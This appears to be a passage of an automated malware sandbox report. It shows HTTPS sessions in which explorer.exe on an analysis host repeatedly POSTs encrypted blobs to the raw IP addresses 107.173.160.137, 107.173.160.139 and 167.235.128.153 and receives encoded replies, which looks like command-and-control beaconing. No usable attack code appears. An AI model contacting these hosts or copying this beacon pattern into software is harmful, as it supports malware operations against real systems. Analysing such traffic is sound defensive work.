                                                          Connection: close
                                                          2024-07-19 11:44:44 UTC685INData Raw: 30 31 59 6e 58 7a 50 36 36 78 70 71 36 74 6c 4e 53 5a 52 4b 73 6e 61 67 6f 4d 74 44 32 7a 51 55 56 71 46 43 76 68 62 43 71 44 38 38 62 63 59 48 53 33 41 6d 51 38 64 68 68 57 4f 45 4f 4d 44 64 58 34 75 58 54 31 46 59 7a 74 54 35 72 2f 30 66 58 31 46 78 51 43 36 4f 53 66 51 37 47 50 42 71 49 68 4d 50 4e 30 56 4e 4b 65 6f 4b 4f 2f 63 65 4a 6e 36 39 32 76 58 67 4f 44 50 4d 61 54 52 38 2b 41 65 61 2b 72 74 35 72 2b 71 30 65 4f 47 4a 49 4d 73 78 65 67 39 6d 31 63 72 46 70 64 70 62 6e 62 73 58 70 56 72 39 72 5a 2b 73 6e 61 75 58 55 50 58 34 4d 59 36 37 71 77 65 77 44 77 4b 5a 53 76 2b 37 54 37 6c 38 61 34 33 77 6a 52 79 50 54 31 6a 71 4a 4c 68 67 52 5a 4b 6b 62 6e 4a 30 47 77 39 4b 74 6e 48 70 4d 58 63 4e 67 67 71 7a 2f 4b 32 5a 4a 59 41 6a 7a 73 64 51 42 38 46
                                                          Data Ascii: 01YnXzP66xpq6tlNSZRKsnagoMtD2zQUVqFCvhbCqD88bcYHS3AmQ8dhhWOEOMDdX4uXT1FYztT5r/0fX1FxQC6OSfQ7GPBqIhMPN0VNKeoKO/ceJn692vXgODPMaTR8+Aea+rt5r+q0eOGJIMsxeg9m1crFpdpbnbsXpVr9rZ+snauXUPX4MY67qwewDwKZSv+7T7l8a43wjRyPT1jqJLhgRZKkbnJ0Gw9KtnHpMXcNggqz/K2ZJYAjzsdQB8F


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.557806107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:45 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:45 UTC1267OUTData Raw: 46 69 39 4e 67 43 6f 2b 54 32 4d 4f 34 70 36 76 31 68 66 74 47 55 6b 68 79 56 69 75 6c 52 54 51 4e 36 56 2f 70 44 2b 31 78 59 30 6c 65 50 43 65 31 54 76 56 4b 43 42 6c 56 6d 42 61 4b 4f 76 41 38 46 6b 39 73 76 32 6c 52 79 4a 51 6c 35 77 4b 2b 73 7a 71 75 63 62 72 38 57 44 47 6b 56 42 6c 37 5a 59 34 58 35 58 31 36 31 78 5a 46 76 70 47 53 53 57 42 72 65 6b 66 6a 6f 71 77 43 56 6e 66 6d 78 69 56 6b 53 59 58 63 69 69 36 37 43 72 42 78 57 77 63 32 52 72 4b 79 71 36 75 2f 6a 57 55 6a 55 6a 46 50 76 78 63 42 73 33 45 44 6f 68 72 33 2b 68 6e 31 62 6a 63 34 64 51 79 69 69 69 50 35 74 44 73 61 55 41 38 67 63 62 79 64 72 46 50 66 4c 2f 44 53 78 6d 54 55 71 41 6d 57 2f 49 6e 64 47 50 72 78 49 6d 67 44 7a 38 61 38 44 37 71 4a 56 56 4a 68 33 4e 44 4c 34 65 41 64 6a 50
                                                          Data Ascii: Fi9NgCo+T2MO4p6v1hftGUkhyViulRTQN6V/pD+1xY0lePCe1TvVKCBlVmBaKOvA8Fk9sv2lRyJQl5wK+szqucbr8WDGkVBl7ZY4X5X161xZFvpGSSWBrekfjoqwCVnfmxiVkSYXcii67CrBxWwc2RrKyq6u/jWUjUjFPvxcBs3EDohr3+hn1bjc4dQyiiiP5tDsaUA8gcbydrFPfL/DSxmTUqAmW/IndGPrxImgDz8a8D7qJVVJh3NDL4eAdjP
                                                          2024-07-19 11:44:46 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:46 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:46 UTC685INData Raw: 6c 38 54 72 54 58 53 67 31 71 33 72 55 75 6a 61 67 30 69 4f 47 78 4b 61 4a 77 51 4b 56 6d 34 35 56 4d 45 48 58 5a 33 59 38 55 79 2b 57 6e 4e 55 50 70 63 49 61 78 42 41 4b 62 4b 38 41 6f 70 76 36 32 33 56 4e 30 64 46 66 45 6b 69 4c 47 32 6c 70 43 63 4d 48 71 69 5a 75 55 58 39 74 48 6c 51 71 39 35 78 68 6b 4b 42 57 66 63 6c 53 44 38 59 64 58 55 79 72 72 39 4a 68 6a 75 7a 52 74 77 6f 30 4e 64 4b 79 56 6e 36 72 4f 6d 4d 67 71 6c 36 36 65 49 77 6f 4c 33 43 30 70 50 63 62 63 7a 50 76 48 6a 76 53 5a 6b 63 30 79 54 73 49 55 68 33 36 4f 76 37 6a 2f 52 33 77 37 42 35 4b 2f 51 51 45 77 38 78 4a 65 65 76 6d 34 38 53 4a 4c 6b 58 7a 67 42 6a 7a 6d 47 72 2f 69 79 6b 53 58 58 33 42 45 64 61 78 63 34 61 35 4c 65 6f 51 38 76 68 71 33 62 4f 61 4f 4b 37 6d 78 6f 7a 2b 53 36
                                                          Data Ascii: l8TrTXSg1q3rUujag0iOGxKaJwQKVm45VMEHXZ3Y8Uy+WnNUPpcIaxBAKbK8Aopv623VN0dFfEkiLG2lpCcMHqiZuUX9tHlQq95xhkKBWfclSD8YdXUyrr9JhjuzRtwo0NdKyVn6rOmMgql66eIwoL3C0pPcbczPvHjvSZkc0yTsIUh36Ov7j/R3w7B5K/QQEw8xJeevm48SJLkXzgBjzmGr/iykSXX3BEdaxc4a5LeoQ8vhq3bOaOK7mxoz+S6


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.557807107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:47 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:47 UTC1267OUTData Raw: 66 45 38 6e 34 69 44 69 32 61 4f 4a 68 76 34 65 47 6a 39 6b 6e 6e 37 45 43 69 4c 63 44 63 4d 45 72 4e 39 39 2f 66 64 70 54 59 72 5a 43 50 72 49 45 54 6c 57 4c 6e 70 41 47 6c 52 76 36 39 6f 4f 73 64 57 6b 4a 4d 59 77 68 43 73 30 64 66 38 56 37 52 30 31 73 46 72 63 76 53 47 59 39 2f 52 6b 54 55 4b 41 70 55 2b 6d 68 44 76 7a 2f 75 43 48 64 44 79 2f 39 56 2b 4d 48 4f 67 53 78 6e 43 36 48 41 62 53 33 4c 69 54 5a 4d 54 30 6b 2b 77 51 55 62 5a 71 34 4c 43 71 6f 34 58 31 2b 55 56 54 6b 34 59 51 48 69 49 61 35 55 65 51 47 65 38 42 63 2f 67 58 77 77 6f 48 36 4c 55 73 6e 6e 47 6f 50 64 5a 41 77 63 41 68 45 61 4d 35 62 76 4a 33 39 70 68 4d 5a 36 35 75 4d 51 57 6f 43 4a 73 7a 4b 4f 52 78 43 47 71 6d 6f 73 79 58 6e 44 62 49 76 2f 53 4a 50 73 42 74 72 33 4a 66 74 79 50
                                                          Data Ascii: fE8n4iDi2aOJhv4eGj9knn7ECiLcDcMErN99/fdpTYrZCPrIETlWLnpAGlRv69oOsdWkJMYwhCs0df8V7R01sFrcvSGY9/RkTUKApU+mhDvz/uCHdDy/9V+MHOgSxnC6HAbS3LiTZMT0k+wQUbZq4LCqo4X1+UVTk4YQHiIa5UeQGe8Bc/gXwwoH6LUsnnGoPdZAwcAhEaM5bvJ39phMZ65uMQWoCJszKORxCGqmosyXnDbIv/SJPsBtr3JftyP
                                                          2024-07-19 11:44:48 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:48 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:48 UTC685INData Raw: 68 2f 57 42 74 49 50 69 54 46 43 31 65 2f 42 44 32 51 50 72 72 75 75 4e 58 30 64 36 7a 76 41 5a 53 39 53 4c 75 6a 4a 6f 62 5a 63 70 51 59 74 66 38 38 63 49 71 69 6b 78 75 5a 48 49 43 6d 78 69 77 78 32 39 49 39 35 71 34 66 54 53 72 43 7a 6a 51 66 2f 66 2b 4d 6a 34 55 70 70 47 64 52 6e 6e 38 34 6e 72 6b 70 55 39 4a 56 6d 44 73 54 6b 74 53 6c 39 48 32 65 4a 53 70 73 68 78 6b 6a 69 78 42 41 74 6b 36 51 31 61 70 69 75 48 58 2f 42 77 6b 59 71 2f 6f 48 67 4c 70 7a 62 4f 54 68 33 33 49 49 46 6f 50 41 39 59 4a 63 4e 53 7a 51 58 6f 46 4b 7a 59 68 5a 36 54 7a 6c 74 36 6f 54 57 4b 43 44 32 55 43 53 79 62 37 5a 78 55 63 6f 7a 49 62 37 58 45 6c 35 70 38 7a 50 72 73 32 53 6c 34 72 6f 4c 46 61 31 58 41 65 62 70 6e 73 79 49 4e 45 56 34 4e 36 2f 55 62 78 41 6f 70 7a 30 72
                                                          Data Ascii: h/WBtIPiTFC1e/BD2QPrruuNX0d6zvAZS9SLujJobZcpQYtf88cIqikxuZHICmxiwx29I95q4fTSrCzjQf/f+Mj4UppGdRnn84nrkpU9JVmDsTktSl9H2eJSpshxkjixBAtk6Q1apiuHX/BwkYq/oHgLpzbOTh33IIFoPA9YJcNSzQXoFKzYhZ6Tzlt6oTWKCD2UCSyb7ZxUcozIb7XEl5p8zPrs2Sl4roLFa1XAebpnsyINEV4N6/UbxAopz0r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.557808167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:49 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:44:49 UTC1122OUTData Raw: 51 79 67 4d 7a 45 6a 4c 35 4f 6b 57 34 58 77 77 4f 51 38 6a 51 4b 75 43 31 36 6d 57 43 51 39 2b 58 57 74 37 62 57 53 2b 50 76 77 56 4c 76 31 39 2b 6f 34 6f 65 78 34 67 37 32 59 55 61 78 4b 73 48 78 4b 37 6a 52 35 55 43 5a 6e 56 74 71 77 62 63 70 74 4e 39 74 57 50 39 57 37 4b 6a 55 47 5a 6f 4d 79 79 36 47 68 4d 4d 6d 2b 55 54 4c 69 58 37 30 68 36 44 57 6b 47 68 55 59 36 59 38 42 4d 71 53 62 4f 2f 59 76 4e 41 6a 50 65 63 62 64 35 2b 74 70 65 59 58 5a 52 4f 55 4f 6c 4e 2f 79 75 4f 37 6c 76 35 35 59 6b 52 50 44 48 70 46 51 4c 7a 75 49 67 77 72 47 38 4e 7a 6b 2b 45 72 43 6d 73 51 72 4b 45 54 72 74 44 5a 67 4b 39 6d 66 2f 65 48 37 51 54 44 56 62 39 70 34 59 47 35 75 31 78 75 73 57 39 44 33 79 4a 6a 49 5a 52 53 66 43 2b 52 65 36 6f 4a 58 34 69 59 68 74 6d 45 6d
                                                          Data Ascii: QygMzEjL5OkW4XwwOQ8jQKuC16mWCQ9+XWt7bWS+PvwVLv19+o4oex4g72YUaxKsHxK7jR5UCZnVtqwbcptN9tWP9W7KjUGZoMyy6GhMMm+UTLiX70h6DWkGhUY6Y8BMqSbO/YvNAjPecbd5+tpeYXZROUOlN/yuO7lv55YkRPDHpFQLzuIgwrG8Nzk+ErCmsQrKETrtDZgK9mf/eH7QTDVb9p4YG5u1xusW9D3yJjIZRSfC+Re6oJX4iYhtmEm
                                                          2024-07-19 11:44:50 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:50 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:50 UTC685INData Raw: 51 5a 6c 57 59 4c 63 46 77 43 67 35 7a 75 64 32 74 56 54 57 46 4e 58 77 72 55 70 65 43 4c 76 37 49 71 30 2f 68 63 76 41 76 4c 5a 7a 64 39 53 53 52 67 71 57 77 2b 66 47 73 5a 68 36 63 6f 47 7a 31 54 58 43 4a 55 46 74 4a 44 57 68 72 57 49 31 41 36 70 64 56 48 36 5a 52 77 63 55 56 79 5a 30 46 65 42 36 45 4f 2b 64 59 52 53 6f 74 41 54 74 64 2f 48 4d 32 32 75 4a 37 35 76 6e 53 67 6b 69 73 37 39 73 4e 4e 4b 37 71 36 76 74 37 77 67 67 5a 6c 62 35 76 78 79 67 6f 49 78 36 4b 34 72 52 75 62 68 56 4c 72 4e 61 59 34 47 34 42 77 50 71 6d 74 6f 5a 67 71 57 7a 51 54 72 55 42 58 72 38 68 65 79 48 4d 58 45 67 65 68 44 33 32 65 54 50 4a 6c 68 74 68 48 59 6b 36 79 4e 58 79 64 6c 79 45 6c 4d 50 54 79 42 6b 59 78 58 71 5a 4c 6c 42 38 4c 6f 2b 69 43 35 6c 58 52 61 36 58 38 2b
                                                          Data Ascii: QZlWYLcFwCg5zud2tVTWFNXwrUpeCLv7Iq0/hcvAvLZzd9SSRgqWw+fGsZh6coGz1TXCJUFtJDWhrWI1A6pdVH6ZRwcUVyZ0FeB6EO+dYRSotATtd/HM22uJ75vnSgkis79sNNK7q6vt7wggZlb5vxygoIx6K4rRubhVLrNaY4G4BwPqmtoZgqWzQTrUBXr8heyHMXEgehD32eTPJlhthHYk6yNXydlyElMPTyBkYxXqZLlB8Lo+iC5lXRa6X8+


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.557809107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:51 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:51 UTC1267OUTData Raw: 49 47 2b 6b 55 33 51 63 4d 41 2b 4e 51 79 70 77 6e 6d 71 70 42 45 31 63 6e 4c 52 4e 72 68 51 70 6a 32 61 78 2b 72 37 6d 6f 61 46 49 73 47 6e 57 4f 77 65 42 65 57 70 61 63 6b 68 41 68 62 31 79 48 71 58 68 74 6a 6d 55 54 37 74 2f 2b 44 72 6e 49 49 42 49 53 78 37 6c 36 77 68 32 71 63 5a 34 52 2f 59 59 6a 4f 35 75 52 39 34 66 35 44 53 41 62 31 30 76 39 46 69 33 51 6a 75 54 36 58 53 79 4c 66 66 4d 39 46 7a 56 75 44 36 6a 42 69 55 6c 56 4a 6a 59 6d 51 4f 78 43 30 4a 36 68 79 55 42 71 6b 38 46 4c 41 54 2b 2f 46 63 4a 66 50 54 4b 57 49 52 2b 2b 57 70 4a 4d 6c 48 53 61 71 42 48 6c 6e 68 73 55 42 44 33 4a 6a 64 69 34 47 4b 4f 63 45 58 65 65 6b 78 5a 72 38 77 6a 69 4b 4b 31 6d 7a 4c 30 53 4d 49 4e 56 6e 4b 70 4d 47 36 6d 63 39 39 78 55 4e 6d 34 35 4e 57 4b 45 67 50
                                                          Data Ascii: IG+kU3QcMA+NQypwnmqpBE1cnLRNrhQpj2ax+r7moaFIsGnWOweBeWpackhAhb1yHqXhtjmUT7t/+DrnIIBISx7l6wh2qcZ4R/YYjO5uR94f5DSAb10v9Fi3QjuT6XSyLffM9FzVuD6jBiUlVJjYmQOxC0J6hyUBqk8FLAT+/FcJfPTKWIR++WpJMlHSaqBHlnhsUBD3Jjdi4GKOcEXeekxZr8wjiKK1mzL0SMINVnKpMG6mc99xUNm45NWKEgP
                                                          2024-07-19 11:44:52 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:52 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:52 UTC685INData Raw: 30 4a 32 6b 32 33 36 47 35 47 39 48 75 7a 32 62 58 42 54 72 72 36 74 74 30 53 32 4f 59 30 30 63 71 4c 79 6a 33 79 36 62 73 72 2b 48 62 61 52 42 6e 35 45 6b 51 4a 71 66 39 65 7a 4e 77 51 6f 39 62 46 41 57 53 71 31 4e 78 66 53 78 6d 49 71 57 70 50 6f 73 61 77 50 2f 33 74 46 7a 4c 71 72 30 36 75 48 68 72 64 65 54 7a 76 37 51 5a 66 32 32 61 38 51 67 79 78 53 63 6e 55 72 38 48 33 4c 43 79 75 6f 78 79 37 71 78 33 50 77 6d 74 4c 77 33 4e 50 4f 53 70 57 56 67 2f 44 6e 36 45 43 50 62 62 30 7a 6b 31 6a 6e 6e 46 75 49 30 78 59 65 50 59 49 50 70 6b 30 4d 76 75 2b 58 32 4c 44 63 58 71 6a 36 48 47 54 6d 65 6c 59 58 47 7a 43 70 63 64 34 46 6b 6e 37 67 74 66 76 32 68 62 69 55 4d 38 2b 57 44 34 4c 70 4a 53 59 79 35 32 43 64 64 2f 51 71 45 77 39 74 37 77 72 47 31 31 4d 2f
                                                          Data Ascii: 0J2k236G5G9Huz2bXBTrr6tt0S2OY00cqLyj3y6bsr+HbaRBn5EkQJqf9ezNwQo9bFAWSq1NxfSxmIqWpPosawP/3tFzLqr06uHhrdeTzv7QZf22a8QgyxScnUr8H3LCyuoxy7qx3PwmtLw3NPOSpWVg/Dn6ECPbb0zk1jnnFuI0xYePYIPpk0Mvu+X2LDcXqj6HGTmelYXGzCpcd4Fkn7gtfv2hbiUM8+WD4LpJSYy52Cdd/QqEw9t7wrG11M/


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.557810107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:53 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:53 UTC1267OUTData Raw: 44 57 4f 36 79 45 57 56 47 2f 61 4c 7a 62 2f 6d 50 56 63 76 42 44 50 31 64 51 55 77 54 78 2f 4e 39 32 79 4d 78 2b 6c 66 55 78 57 67 76 2b 58 4b 48 38 50 73 33 64 43 38 68 49 30 58 68 45 66 2b 65 4f 4a 47 47 51 48 59 39 45 4f 6c 37 72 6a 59 33 55 65 66 38 75 58 57 6e 72 4c 75 58 58 52 58 51 47 67 69 6b 51 57 71 4a 34 4e 51 56 53 30 65 66 77 48 56 31 74 51 64 2b 49 46 39 2b 2f 41 4e 53 31 73 55 46 68 35 36 50 34 42 46 6b 42 61 4f 55 33 75 66 39 62 49 41 57 63 5a 32 59 65 72 31 63 45 35 6a 6e 33 41 75 62 6b 51 67 42 66 4a 35 35 69 44 4c 62 69 54 59 6e 39 66 74 56 57 63 6c 61 5a 38 33 50 4d 59 5a 49 37 57 54 45 41 79 4a 6a 64 6a 69 7a 41 52 44 79 4f 76 48 2f 2b 41 75 50 38 38 72 38 66 6c 65 63 50 6c 4e 47 67 69 6c 6c 35 2b 4e 61 43 6d 61 43 55 49 42 6b 61 75
                                                          Data Ascii: DWO6yEWVG/aLzb/mPVcvBDP1dQUwTx/N92yMx+lfUxWgv+XKH8Ps3dC8hI0XhEf+eOJGGQHY9EOl7rjY3Uef8uXWnrLuXXRXQGgikQWqJ4NQVS0efwHV1tQd+IF9+/ANS1sUFh56P4BFkBaOU3uf9bIAWcZ2Yer1cE5jn3AubkQgBfJ55iDLbiTYn9ftVWclaZ83PMYZI7WTEAyJjdjizARDyOvH/+AuP88r8flecPlNGgill5+NaCmaCUIBkau
                                                          2024-07-19 11:44:54 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:54 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:54 UTC685INData Raw: 6d 6a 4c 31 2f 56 4e 31 4e 59 62 36 4b 73 48 44 64 6e 65 46 6c 51 6b 2f 2f 55 58 65 62 73 71 69 4f 6d 70 57 32 38 63 41 62 6e 38 6d 6d 66 31 71 4b 61 65 4a 6c 58 57 63 44 67 43 56 4c 74 68 32 30 69 67 62 32 48 6f 4a 73 39 68 50 6a 4a 4d 6b 6b 67 6c 63 43 69 36 38 4a 6f 59 79 68 2f 52 69 45 70 6e 34 4f 49 42 55 44 57 42 4a 53 30 51 6d 2f 6b 4f 30 74 66 75 76 62 39 61 66 48 2b 61 75 6e 32 6b 76 6b 50 4f 73 79 69 47 79 43 77 33 39 71 79 4f 39 55 6a 2f 46 62 54 6f 33 79 49 33 63 69 6c 4f 74 69 61 4d 47 6d 50 32 4b 75 79 50 69 4b 36 6e 58 4a 6e 31 6d 65 62 62 61 47 45 53 30 73 73 7a 67 43 2b 6b 78 49 33 31 64 50 37 67 48 58 55 32 59 4d 5a 4b 61 69 74 73 7a 77 4d 4c 79 6a 44 55 78 43 54 54 70 42 4d 55 38 38 6f 56 45 50 78 7a 65 64 67 6a 66 66 76 38 54 45 63 31
                                                          Data Ascii: mjL1/VN1NYb6KsHDdneFlQk//UXebsqiOmpW28cAbn8mmf1qKaeJlXWcDgCVLth20igb2HoJs9hPjJMkkglcCi68JoYyh/RiEpn4OIBUDWBJS0Qm/kO0tfuvb9afH+aun2kvkPOsyiGyCw39qyO9Uj/FbTo3yI3cilOtiaMGmP2KuyPiK6nXJn1mebbaGES0sszgC+kxI31dP7gHXU2YMZKaitszwMLyjDUxCTTpBMU88oVEPxzedgjffv8TEc1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.557811167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:55 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:55 UTC1267OUTData Raw: 6e 4d 66 39 64 4d 57 4d 52 63 59 59 46 4f 36 72 4b 32 72 71 4b 48 53 54 73 6d 53 6d 4e 2b 57 50 36 71 70 32 46 74 57 58 72 6e 54 53 4c 71 4b 4a 5a 37 38 55 4d 46 6b 78 73 75 39 65 6d 4d 6c 4c 32 4d 72 43 62 4c 67 68 51 6f 2b 61 33 74 75 31 6e 6b 48 6e 45 7a 4b 52 36 48 6b 59 68 39 38 4a 50 4d 37 72 6b 49 59 4d 39 36 52 6f 35 2f 6a 35 56 6a 7a 67 49 76 66 6e 69 68 6f 43 37 42 47 78 4e 41 76 48 2f 55 58 45 4d 33 79 75 63 6a 58 70 77 72 75 34 4d 34 64 44 68 2b 61 34 48 76 5a 55 73 55 68 32 7a 6f 75 71 31 77 32 32 47 79 35 4c 67 49 50 4e 53 59 50 42 43 36 30 73 44 6f 31 6c 48 75 4f 49 44 7a 54 4d 4b 44 2b 6a 74 66 38 62 38 2b 33 39 59 54 45 67 55 45 6c 30 79 43 4c 37 4e 53 6e 69 76 74 35 59 6b 43 64 68 44 31 6e 6d 52 45 65 69 31 6a 68 30 63 37 38 71 5a 53 48
                                                          Data Ascii: nMf9dMWMRcYYFO6rK2rqKHSTsmSmN+WP6qp2FtWXrnTSLqKJZ78UMFkxsu9emMlL2MrCbLghQo+a3tu1nkHnEzKR6HkYh98JPM7rkIYM96Ro5/j5VjzgIvfnihoC7BGxNAvH/UXEM3yucjXpwru4M4dDh+a4HvZUsUh2zouq1w22Gy5LgIPNSYPBC60sDo1lHuOIDzTMKD+jtf8b8+39YTEgUEl0yCL7NSnivt5YkCdhD1nmREei1jh0c78qZSH
                                                          2024-07-19 11:44:56 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:55 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:44:56 UTC685INData Raw: 41 6b 4e 6c 79 65 51 55 49 57 4d 30 43 74 45 43 57 65 76 78 4e 30 31 50 63 63 2f 47 5a 78 4b 71 52 44 34 76 48 31 41 6f 6f 4d 47 63 37 36 65 49 65 6a 35 70 33 4d 37 4b 56 4a 5a 32 2b 4f 6e 6b 33 53 6a 67 41 72 65 43 46 46 58 39 6e 55 39 71 37 5a 43 2b 50 6d 33 68 33 70 37 4a 70 70 52 74 49 4b 32 6e 5a 4b 4d 75 42 63 48 68 62 4d 53 48 79 44 6e 39 32 39 48 41 34 4d 65 56 54 47 61 62 42 38 52 50 4f 4c 54 41 55 4c 6f 49 4a 72 76 31 76 6f 4d 61 59 63 69 35 32 37 57 77 4a 70 39 2f 56 7a 77 6a 4a 68 70 77 4e 70 56 5a 64 66 65 6e 65 47 45 57 33 55 6c 77 51 47 31 68 52 39 59 62 55 33 70 75 41 68 69 2f 70 67 78 4b 2f 69 56 31 51 72 50 5a 6d 49 55 53 38 7a 46 61 37 66 37 72 36 4d 38 73 47 65 61 75 5a 43 57 6c 42 38 71 49 57 31 62 4c 4f 52 76 34 64 42 31 64 49 56 58
                                                          Data Ascii: AkNlyeQUIWM0CtECWevxN01Pcc/GZxKqRD4vH1AooMGc76eIej5p3M7KVJZ2+Onk3SjgAreCFFX9nU9q7ZC+Pm3h3p7JppRtIK2nZKMuBcHhbMSHyDn929HA4MeVTGabB8RPOLTAULoIJrv1voMaYci527WwJp9/VzwjJhpwNpVZdfeneGEW3UlwQG1hR9YbU3puAhi/pgxK/iV1QrPZmIUS8zFa7f7r6M8sGeauZCWlB8qIW1bLORv4dB1dIVX


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.557812107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:44:57 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:44:57 UTC1267OUTData Raw: 43 32 2b 36 45 4b 64 6c 67 52 6d 74 51 31 71 70 6a 41 65 36 47 79 56 5a 49 77 4b 54 6b 6b 67 37 49 32 74 30 54 72 43 4f 67 6e 54 75 5a 77 67 7a 78 53 4e 53 7a 55 6a 75 74 62 74 45 4c 76 51 5a 70 71 37 57 65 68 37 38 77 44 44 31 76 41 32 45 4c 71 30 63 69 4a 53 44 35 6f 41 30 4e 76 5a 69 6c 4d 2b 50 47 54 57 4e 77 64 64 57 2b 6e 4b 63 6f 6b 2b 43 45 34 4e 71 6e 57 33 56 47 71 42 4c 53 32 68 70 51 66 61 63 6a 79 66 43 4a 6e 58 33 42 6d 55 31 73 76 56 37 2b 57 74 41 6a 2f 36 56 41 64 54 75 52 38 71 68 34 4d 6a 64 77 47 53 62 5a 4c 75 62 6b 77 47 43 39 43 4e 52 34 58 2b 4a 39 42 68 46 76 4a 35 4e 58 74 6b 49 76 4b 6e 42 50 41 61 72 48 6e 6c 6e 56 6a 6e 4e 4d 7a 4d 37 68 73 37 71 51 6d 52 79 79 6e 47 67 57 6c 77 52 73 79 46 32 4f 33 38 33 58 59 50 47 79 73 65
                                                          Data Ascii: C2+6EKdlgRmtQ1qpjAe6GyVZIwKTkkg7I2t0TrCOgnTuZwgzxSNSzUjutbtELvQZpq7Weh78wDD1vA2ELq0ciJSD5oA0NvZilM+PGTWNwddW+nKcok+CE4NqnW3VGqBLS2hpQfacjyfCJnX3BmU1svV7+WtAj/6VAdTuR8qh4MjdwGSbZLubkwGC9CNR4X+J9BhFvJ5NXtkIvKnBPAarHnlnVjnNMzM7hs7qQmRyynGgWlwRsyF2O383XYPGyse
                                                          2024-07-19 11:44:58 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:44:58 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
